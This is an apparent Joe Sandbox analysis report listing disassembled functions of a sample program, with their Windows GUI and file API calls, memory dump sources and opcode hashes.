                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDeleteDestroyObject
                                    • String ID: ,WL$pTL
                                    • API String ID: 1476932828-3286615107
                                    • Opcode ID: 5f3fead24833251ed92028c9d1dd53232e6704ad58255eddf26a865bf0b99541
                                    • Instruction ID: 8575c1aaab52896b8854b459f33dc7ac8b5529b305081f5d80f41c7b9476b028
                                    • Opcode Fuzzy Hash: 5f3fead24833251ed92028c9d1dd53232e6704ad58255eddf26a865bf0b99541
                                    • Instruction Fuzzy Hash: CC214AB5904742DFC314DF66C880A96FBE4FF54314F448A2EE4AA83741C778A509CFA6
                                    Function 00417500 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00417564
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00417596
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipColorCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 534515830-168633513
                                    • Opcode ID: 3d43f345c0ee6032f59d478415723119a875c9d9930fdc7b76ff7428b883b08a
                                    • Instruction ID: 5faaa814b520aa5db3e848f2d67c6ae38c6f9d45018c8237acc9e5bed10623ee
                                    • Opcode Fuzzy Hash: 3d43f345c0ee6032f59d478415723119a875c9d9930fdc7b76ff7428b883b08a
                                    • Instruction Fuzzy Hash: BC219D75608B40AFD320EF24C840FABB7E8BB48714F04891EF4A683790DB78DA04CB56
                                    Function 00415E90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(00415E35,000000B1,00000000,000000FF), ref: 00415F1D
                                    • SendMessageA.USER32(00415E35,000000B7,00000000,00000000), ref: 00415F2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: 5^A
                                    • API String ID: 3850602802-4160946101
                                    • Opcode ID: d247cf3e3a44aea95b455a19998177c14d2596c31b37c7479a27b1962a8ca024
                                    • Instruction ID: ae996621357e419a2b1836c855971881300344079edc5849084fd7216a5cf831
                                    • Opcode Fuzzy Hash: d247cf3e3a44aea95b455a19998177c14d2596c31b37c7479a27b1962a8ca024
                                    • Instruction Fuzzy Hash: 3411B675604B01EBD328DB29CC41FABB7E5ABC4720F104B0EF469973D0CB78A8058B65
                                    Function 004258E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0042591D
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00425950
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipColorCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 534515830-168633513
                                    • Opcode ID: 5f6e00adf3f7ab20d58d2dbbd54e088dd88927efcce405a77d8fc206a5f3b728
                                    • Instruction ID: 552e561fdbf0166cd28adb9a79dbbaed0f2a92054f4daae748d5b24d6d2a34ac
                                    • Opcode Fuzzy Hash: 5f6e00adf3f7ab20d58d2dbbd54e088dd88927efcce405a77d8fc206a5f3b728
                                    • Instruction Fuzzy Hash: 9011C2B9508741EFC340EF60C945F5BB7E4BB84718F408A1DF0AA82291DB38D608CB56
                                    Function 004B65A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000800,?,004B657E,?,00000000,00000000,?,00000800,00000000,004B628F,?,00000000), ref: 004B65D0
                                    • GetLastError.KERNEL32(?,004B49DB,?,00000000,?,004B440B,00000000,00000000,00000000), ref: 004B65DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID: Vv
                                    • API String ID: 2976181284-3647087049
                                    • Opcode ID: 9dca706799b8bd5e741fd39d64bcc904f3b0abb6ed8f2a996d6f725ca07f0531
                                    • Instruction ID: b129794a52d0e3bc3e160ab28d139e9a8e4c8d756075aadc5976d19f53a86bf1
                                    • Opcode Fuzzy Hash: 9dca706799b8bd5e741fd39d64bcc904f3b0abb6ed8f2a996d6f725ca07f0531
                                    • Instruction Fuzzy Hash: F2F0A93121451197CA605B78BD489AA3759AB86334F220B6FF521C71E1DF2CD8258676
                                    Function 004C38F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C38FE
                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 004C396A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologMessageSend
                                    • String ID: JeL
                                    • API String ID: 2337391251-3853271901
                                    • Opcode ID: fea380a277769a6f8feee8206a26a459704128f25a80f072baa889b7e2c66406
                                    • Instruction ID: b6e4f8855bb17bfc801ae863b95be8123711327303cde7c2a9c67c4c4e155a4a
                                    • Opcode Fuzzy Hash: fea380a277769a6f8feee8206a26a459704128f25a80f072baa889b7e2c66406
                                    • Instruction Fuzzy Hash: F201A2B1901225AFDB54DF98C885FDDBBA0FF04724F20811EF445BB291D7B8AA01CB98
                                    Function 004C2AA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowOrgEx.GDI32(?,5JC,?,?), ref: 004C2AC7
                                    • SetWindowOrgEx.GDI32(?,5JC,?,?), ref: 004C2ADB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window
                                    • String ID: 5JC
                                    • API String ID: 2353593579-950159820
                                    • Opcode ID: 8a53aeb99f5dcc3a05416dd99c35e8b38948be132383127725415a923c6c9a64
                                    • Instruction ID: 5d2e00247323250744257e458a1353971af8b8d245de23a7a6b3ec5ea25bf631
                                    • Opcode Fuzzy Hash: 8a53aeb99f5dcc3a05416dd99c35e8b38948be132383127725415a923c6c9a64
                                    • Instruction Fuzzy Hash: B6F0F47A900218BF8B15CF89C841CAEBBB9EF48310B05845EF91593220D7B1FE50CBA4
                                    Function 004C2E7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C2E81
                                    • 7405A570.USER32(?,?,?,004113C0,00000000), ref: 004C2EAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: 7405A570H_prolog
                                    • String ID: DTL
                                    • API String ID: 4111123777-695167461
                                    • Opcode ID: 121082b36d2f9ce5a7b1538529e7d687b6c805d4854c5c3615f9b49f9978ba57
                                    • Instruction ID: 0ad872f63a77106e7c91f2f2906bf2b4e3059f97cb2867cafd7148f13e5c1a50
                                    • Opcode Fuzzy Hash: 121082b36d2f9ce5a7b1538529e7d687b6c805d4854c5c3615f9b49f9978ba57
                                    • Instruction Fuzzy Hash: ADF08275A10610ABC794EF999901F5EB6E4AF08305F00452FF501D7301D7F8C9008798
                                    Function 004C2FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C2FE9
                                    • BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BeginH_prologPaint
                                    • String ID: PTL
                                    • API String ID: 1900852855-843080265
                                    • Opcode ID: cf767f8b2dadf3fa11958a3551a20c01032f35aedacb62a8aa2833cb9d4265fd
                                    • Instruction ID: 26de4cf904e9894bcbdae37321607601514c036d8fab4bc04e8cc9c2b1bbc595
                                    • Opcode Fuzzy Hash: cf767f8b2dadf3fa11958a3551a20c01032f35aedacb62a8aa2833cb9d4265fd
                                    • Instruction Fuzzy Hash: 8FF08CB5A10611AFCB98EF99D911F6EB7E8EF08305F00452FF502D7601D7F89A008BA8
                                    Function 004C3191 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateH_prolog
                                    • String ID: vTL
                                    • API String ID: 1255700769-243292187
                                    • Opcode ID: 2c4be59da6481b14e591a2a2fe9e987828a5e472d4d08025a9095b3a413e9a2f
                                    • Instruction ID: b9a0dff20470a99071454f7642fab0ce3705e63d8d9f566d04c2644ed7c439f2
                                    • Opcode Fuzzy Hash: 2c4be59da6481b14e591a2a2fe9e987828a5e472d4d08025a9095b3a413e9a2f
                                    • Instruction Fuzzy Hash: 82F06575600215EFCB519F85DC05FAEBBB4FF1471AF00C42EF456A6601CB799A118B98
                                    Function 004C31E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
